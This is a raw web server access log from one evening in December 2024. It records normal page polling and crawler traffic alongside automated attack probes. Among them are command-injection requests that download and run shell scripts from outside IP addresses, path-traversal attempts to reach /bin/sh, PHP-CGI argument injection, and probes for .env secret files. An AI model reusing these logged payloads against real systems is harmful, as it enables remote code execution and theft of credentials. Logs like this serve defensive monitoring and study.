178.165.191.42 - - [19/Dec/2024:17:33:16 +0100] "GET /gui/javascript/form_form.js?1734625996 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=625935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
80.82.77.202 - - [19/Dec/2024:17:33:26 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
178.165.191.42 - - [19/Dec/2024:17:34:16 +0100] "GET /entry.php?id=10271&&ser=625996 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=625935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:34:16 +0100] "GET /gui/javascript/form_form.js?1734626056 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=625996" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:35:16 +0100] "GET /entry.php?id=10271&&ser=626056 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=625996" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:35:16 +0100] "GET /gui/javascript/form_form.js?1734626116 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:36:17 +0100] "GET /entry.php?id=10271&&ser=626116 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:36:17 +0100] "GET /gui/javascript/form_form.js?1734626177 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:37:17 +0100] "GET /entry.php?id=10271&&ser=626177 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:37:17 +0100] "GET /gui/javascript/form_form.js?1734626237 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626177" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:38:17 +0100] "GET /entry.php?id=10271&&ser=626237 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626177" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:38:17 +0100] "GET /gui/javascript/form_form.js?1734626297 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626237" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:39:17 +0100] "GET /entry.php?id=10271&&ser=626297 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626237" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:39:18 +0100] "GET /gui/javascript/form_form.js?1734626357 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [19/Dec/2024:17:39:48 +0100] "GET /renault.activities.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [19/Dec/2024:17:40:18 +0100] "GET /entry.php?id=10271&&ser=626357 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626297" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:40:18 +0100] "GET /gui/javascript/form_form.js?1734626418 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:41:18 +0100] "GET /entry.php?id=10271&&ser=626418 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:41:18 +0100] "GET /gui/javascript/form_form.js?1734626478 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:42:18 +0100] "GET /entry.php?id=10271&&ser=626478 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626418" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:42:18 +0100] "GET /gui/javascript/form_form.js?1734626538 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626478" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:43:19 +0100] "GET /entry.php?id=10271&&ser=626538 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626478" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:43:19 +0100] "GET /gui/javascript/form_form.js?1734626599 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:44:19 +0100] "GET /entry.php?id=10271&&ser=626599 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:44:19 +0100] "GET /gui/javascript/form_form.js?1734626659 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:45:19 +0100] "GET /entry.php?id=10271&&ser=626659 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:45:19 +0100] "GET /gui/javascript/form_form.js?1734626719 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626659" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:46:19 +0100] "GET /entry.php?id=10271&&ser=626719 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626659" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:46:20 +0100] "GET /gui/javascript/form_form.js?1734626779 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:47:20 +0100] "GET /entry.php?id=10271&&ser=626779 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:47:20 +0100] "GET /gui/javascript/form_form.js?1734626840 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:48:20 +0100] "GET /entry.php?id=10271&&ser=626840 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:48:20 +0100] "GET /gui/javascript/form_form.js?1734626900 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:49:20 +0100] "GET /entry.php?id=10271&&ser=626900 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:49:20 +0100] "GET /gui/javascript/form_form.js?1734626960 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:50:21 +0100] "GET /entry.php?id=10271&&ser=626960 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:50:21 +0100] "GET /gui/javascript/form_form.js?1734627021 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=626960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:21 +0100] "GET /entry.php?id=10271&&ser=627021 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=626960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:21 +0100] "GET /gui/javascript/form_form.js?1734627081 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=627021" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [19/Dec/2024:17:51:48 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009091503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [19/Dec/2024:17:51:58 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1879 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:58 +0100] "GET /gui/javascript/form_form.js?1734627118 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:59 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:59 +0100] "GET /gui/javascript/form_form.js?1734627119 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:59 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1912 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [19/Dec/2024:17:51:59 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.191.126.213 - - [19/Dec/2024:18:06:16 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [19/Dec/2024:18:16:50 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230917225211.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.74 - - [19/Dec/2024:18:17:15 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
146.70.164.9 - - [19/Dec/2024:18:19:51 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.28.2"
178.215.238.91 - - [19/Dec/2024:18:33:58 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
156.59.198.136 - - [19/Dec/2024:18:42:02 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20231019095110.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:18:46:02 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image095.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.155 - - [19/Dec/2024:18:49:27 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [19/Dec/2024:18:50:03 +0100] "GET /renault.activities.at/htdocs/binaries/10089015.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
37.139.5.66 - - [19/Dec/2024:18:52:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
156.59.198.136 - - [19/Dec/2024:18:58:32 +0100] "GET /renault.activities.at/htdocs/binaries/10008563.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:19:02:32 +0100] "GET /renault.activities.at/htdocs/binaries/10188912.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
18.116.86.210 - - [19/Dec/2024:19:07:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [19/Dec/2024:19:14:43 +0100] "GET /ed-test.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.177 - - [19/Dec/2024:19:23:59 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.177 - - [19/Dec/2024:19:23:59 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"
154.213.187.122 - - [19/Dec/2024:19:49:17 +0100] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
156.59.198.135 - - [19/Dec/2024:20:06:58 +0100] "GET /ed-test.activities.at/stats/lang/awstats-bg.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Dec/2024:20:10:58 +0100] "GET /ed-test.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
39.109.123.102 - - [19/Dec/2024:20:32:19 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
39.109.123.102 - - [19/Dec/2024:20:32:27 +0100] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
156.59.198.136 - - [19/Dec/2024:20:35:00 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009231603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:20:39:01 +0100] "GET /renault.activities.at/htdocs/binaries/10122841.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [19/Dec/2024:20:39:31 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [19/Dec/2024:20:43:01 +0100] "GET /ed-test.activities.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [19/Dec/2024:20:45:48 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
156.59.198.135 - - [19/Dec/2024:20:47:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911150803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Dec/2024:20:51:01 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912171003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.120.18 - - [19/Dec/2024:20:56:18 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; MI 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
95.214.53.91 - - [19/Dec/2024:20:57:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.120.18 - - [19/Dec/2024:21:00:58 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux i686; rv:32.0) Gecko/20100101 Firefox/32.0"
156.59.198.135 - - [19/Dec/2024:21:13:51 +0100] "GET /ed-test.activities.at/stats/lang/awstats-mk.txt HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Dec/2024:21:17:51 +0100] "GET /renault.2web.at/htdocs/binaries/10623060.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
209.38.98.129 - - [19/Dec/2024:21:27:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
209.38.98.129 - - [19/Dec/2024:21:27:09 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (compatible)"
156.59.198.136 - - [19/Dec/2024:21:44:38 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101181203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Dec/2024:21:48:38 +0100] "GET /renault.activities.at/htdocs/binaries/10223415.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:21:57:15 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908271403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.32 - - [19/Dec/2024:21:59:06 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
199.45.154.116 - - [19/Dec/2024:22:06:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
199.45.154.116 - - [19/Dec/2024:22:06:07 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.116 - - [19/Dec/2024:22:06:08 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.116 - - [19/Dec/2024:22:06:09 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.116 - - [19/Dec/2024:22:06:10 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.135 - - [19/Dec/2024:22:16:41 +0100] "GET /renault.2web.at/htdocs/binaries/10661192.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.238.91 - - [19/Dec/2024:22:21:41 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
178.215.236.240 - - [19/Dec/2024:22:28:06 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0"
31.220.1.88 - - [19/Dec/2024:22:29:34 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
95.214.55.32 - - [19/Dec/2024:22:33:52 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.136 - - [19/Dec/2024:22:55:35 +0100] "GET /renault.activities.at/htdocs/binaries/10225298.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:22:59:34 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image065.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:23:03:35 +0100] "GET /ed-test.2web.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
199.127.63.64 - - [19/Dec/2024:23:11:10 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
185.191.126.213 - - [19/Dec/2024:23:11:22 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [19/Dec/2024:23:11:35 +0100] "GET /renault.2web.at/htdocs/binaries/10444274.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [19/Dec/2024:23:15:35 +0100] "GET /renault.2web.at/htdocs/binaries/10009030.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.156.175.51 - - [19/Dec/2024:23:18:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
95.214.55.79 - - [19/Dec/2024:23:18:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [19/Dec/2024:23:19:35 +0100] "GET /renault.activities.at/htdocs/binaries/10225293.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [19/Dec/2024:23:23:36 +0100] "GET /renault.activities.at/htdocs/binaries/10228523.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
101.66.172.251 - - [19/Dec/2024:23:36:56 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:36:57 +0100] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 373 "-" "Custom-AsyncHttpClient"
101.66.172.251 - - [19/Dec/2024:23:36:58 +0100] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 356 "-" "Custom-AsyncHttpClient"
